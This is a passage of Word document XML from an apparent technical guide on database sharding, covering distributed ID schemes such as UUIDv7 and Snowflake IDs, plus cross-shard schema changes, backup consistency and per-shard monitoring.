    <w:p w14:paraId="51F84ECD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cons: 128 bits (large), random (poor index locality → page splits), not sortable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3FCC4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. UUIDv7 (Time-ordered UUID):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5434D36D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099FEFD7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>id = uuidv7()  → "018f3d4e-5c6d-7000-8000-abcdef123456"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C0CC84" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                   ^^^^^^^^^ ^^^^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A72D3C0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                   timestamp  random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42322087" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="1816A23A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Pros: Globally unique, sortable by time (good index locality), 128 bits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375A53FA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cons: Still 128 bits (larger than int64).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F546D8C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Snowflake ID (Twitter's approach):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FB5187" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38736E54" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>64-bit ID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5C4E87" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌──────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533D6BDB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>│ 41 bits: timestamp   │ 10 bits:  │ 12 bits:     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765F9017" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ (ms since epoch)     │ machine ID│ sequence     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B27B2E6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└──────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D06F4CD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="1EEA2EBF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Capacity: 4096 IDs per millisecond per machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191019CD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Unique: timestamp + machine + sequence guarantees uniqueness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BA7ABB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Sortable: roughly time-ordered (good for range queries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220326AF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Compact: 64 bits (fits in a bigint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEFDDBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Range allocation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A9785" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65338688" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Central authority allocates ranges to each shard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BCF89C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard 1: IDs 1–1,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609A2D0C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard 2: IDs 1,000,001–2,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BEFDED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard 3: IDs 2,000,001–3,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B203B65" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7E938AC6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Each shard generates IDs locally within its range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3FBC25" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>When range is exhausted → request new range from central authority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1121DF24" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="5B7A19C1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Pros: Sequential, compact (int64).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763AEB5C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cons: Central authority is a dependency (must be highly available).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6417FD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Shard-prefixed IDs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F93096" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C99EA4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>id = shard_id * 1_000_000_000 + local_sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D7E39B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4343659C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 0: 0_000_000_001, 0_000_000_002, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9DE346" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 1: 1_000_000_001, 1_000_000_002, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4324A07D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Shard 2: 2_000_000_001, 2_000_000_002, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2DADC1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="466FB6DB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The shard is embedded in the ID → can route to shard by inspecting the ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C6BF35" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="32E248DF">
          <v:rect id="_x0000_i5769" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A23150" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Sharding Operational Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564ABAD4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 Schema Changes (DDL) Across Shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEE3F05" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> ALTER TABLE ADD COLUMN must be applied to ALL shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF45ACA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324BC529" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>100 shards → 100 ALTER TABLE operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD77E34" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>If one fails → inconsistent schema across shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29114F3C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>If ALTER blocks writes (old MySQL) → 100 periods of write downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18196912" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E09AD4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1572"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Online DDL tools:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> pt-online-schema-change (Percona), gh-ost (GitHub) — non-blocking schema changes per shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A06ED6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1572"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rolling application:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Apply to one shard at a time. If failure, rollback that shard, fix, retry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C8EDF1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1572"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Schema versioning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Application handles multiple schema versions simultaneously during rollout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685D2D76" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1572"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vitess:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Manages DDL rollout across shards automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A5EBD2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 Backup and Restore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D54BCF7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E23C3A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Single database: One backup job. Restore to one place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702D5782" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>100 shards: 100 backup jobs. Coordinate timing for consistent cross-shard state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1682F949" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Cross-shard consistency in backups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A21E17" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B693784" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 1 backed up at T=14:30:01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8390A8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 2 backed up at T=14:30:05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08513E5F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="2FD284F9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>If a cross-shard transaction committed between 14:30:01 and 14:30:05:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4422B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard 1's backup has the old state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F4B3A6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard 2's backup has the new state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609CDA18" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Restoring both creates an INCONSISTENT state!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C67AF0B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B34184" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1573"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Point-in-time recovery with synchronized timestamps (WAL replay to same LSN/timestamp).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E53CFE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1573"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Application-level eventual consistency (accept brief inconsistency, self-heals).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6061C685" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1573"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Coordinated snapshot (pause writes briefly, snapshot all shards simultaneously — expensive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2209CBE3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.3 Monitoring N Shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF88B2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568C0E92" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Metrics to track per shard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617E542" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Data size (is one shard growing disproportionately?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2F63B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Query rate (hot shard detection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D2CCB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Latency (per-shard — one slow shard affects scatter-gather queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565C4F39" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Replication lag (each shard has its own replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5811B4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Connection pool utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ABF19F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Error rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76612252" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Disk usage and growth rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076EA186" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="3A373D5D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Dashboards need:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7439EEA6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Aggregate view (overall system health)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D855CA6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Per-shard drill-down (identify problematic shard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3040405F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Comparison view (identify outlier shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF23DED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="2E1261C3">
          <v:rect id="_x0000_i5770" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="073E7688" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>13. When NOT to Shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0255F330" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
